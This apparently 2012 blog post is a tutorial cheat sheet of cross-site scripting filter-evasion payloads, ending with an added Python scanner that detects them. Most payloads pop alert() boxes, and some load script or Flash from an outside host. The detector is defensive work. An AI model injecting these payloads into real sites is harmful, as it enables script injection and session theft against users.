Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another file extension instead of .js

    <script src="bad.jpg"></script>

4. Put JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade (the gap inside "javascript" below is a real tab or newline character)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use a backslash ("\") to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        original: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        original: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

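Every evasion in items 1, 6, 7, 8 and 9 relies on the same gap: a filter pattern-matches the raw string, while the browser first decodes entities, drops control characters, resolves CSS backslash escapes, strips comments and ignores case. The following is an added example, not code from the original post, of a defender-side check that performs that normalisation before looking for a script scheme, a CSS expression or an on* handler. The sample values are reconstructed from the post's cases with real tab, newline and backslash characters; the entity-encoded sample and the example.invalid host are constructed for this example.

```python
"""Defender-side check for the attribute-level evasions listed in this post.

Added example, not code from the original post: normalise an attribute value
the way a browser will before it acts on it, then look for script.  Sample
values are reconstructed from the post's cases; the entity-encoded sample and
the example.invalid host are constructed.
"""
import html
import re
from html.parser import HTMLParser

# A filter of the kind the post's evasions defeat: pattern match on raw input.
NAIVE = re.compile(r"javascript:|expression\(", re.IGNORECASE)


def naive_filter_hits(value):
    """True if the raw (un-normalised) value matches the naive pattern."""
    return NAIVE.search(value) is not None


def normalize(value):
    """Reduce an attribute value to roughly the form the browser acts on."""
    value = html.unescape(value)                          # &#x6A; -> j  (item 8)
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)   # expr/*x*/ession (item 7)
    # CSS hex escapes: up to six hex digits plus one optional whitespace char
    value = re.sub(r"\\([0-9a-fA-F]{1,6})\s?",
                   lambda m: chr(int(m.group(1), 16)), value)
    value = value.replace("\\", "")                       # expre\ssion, \ja\vasc\ript
    value = re.sub(r"[\x00-\x20\x7f]", "", value)          # jav<TAB>ascript (item 6)
    return value.lower()                                  # sCrIpT (item 1)


def flag_attribute(value):
    """Return a short reason if the value carries script, else None."""
    v = normalize(value)
    if v.startswith(("javascript:", "vbscript:")):
        return "script-scheme url"
    if "javascript:" in v or "expression(" in v or "@import" in v:
        return "script in css"
    return None


class _Scanner(HTMLParser):
    """Walks start tags; flags on* handlers (item 9) and bad attribute values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so case tricks vanish here
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler"))
            elif value is not None:
                reason = flag_attribute(value)
                if reason:
                    self.findings.append((tag, name, reason))


def scan(markup):
    """Return (tag, attribute, reason) for every suspicious attribute in markup."""
    scanner = _Scanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


# Constructed samples mirroring the post's cases.  Whitespace inside
# "javascript" is a real tab or newline; "\\" is a single backslash.
SAMPLES = {
    "tab in scheme (6)":       "jav\tascript:alert('XSS3')",
    "newline in scheme (6)":   "jav\nascript:alert('XSS3')",
    "backslash in css (7)":    "xss:expre\\ssion(alert(\"XSS33\"))",
    "comment in css (7)":      "xss:expr/*anyword*/ession(alert('sss'))",
    "escaped @import (7)":     "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
    "hex entity (8)":          "&#x6A;avascript:alert('XSS')",
    "benign stylesheet":       "http://example.invalid/site.css",
}


def compare():
    """For each sample: (naive filter hit?, verdict after normalisation)."""
    return {k: (naive_filter_hits(v), flag_attribute(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, verdict) in compare().items():
        print(f"{name:24} naive={'hit ' if naive else 'miss'} normalised={verdict}")
    print(scan('<body onload="alert(1)"><IMG SRC="jav\tascript:alert(1)">'))
```

The naive pattern misses every constructed sample, while the normalised check flags all of them and leaves the stylesheet URL alone. Normalising more aggressively than any one browser does is the right bias for a detector: the cost of an over-decoded benign value is a false positive, the cost of an under-decoded one is exactly the bypass this post catalogues.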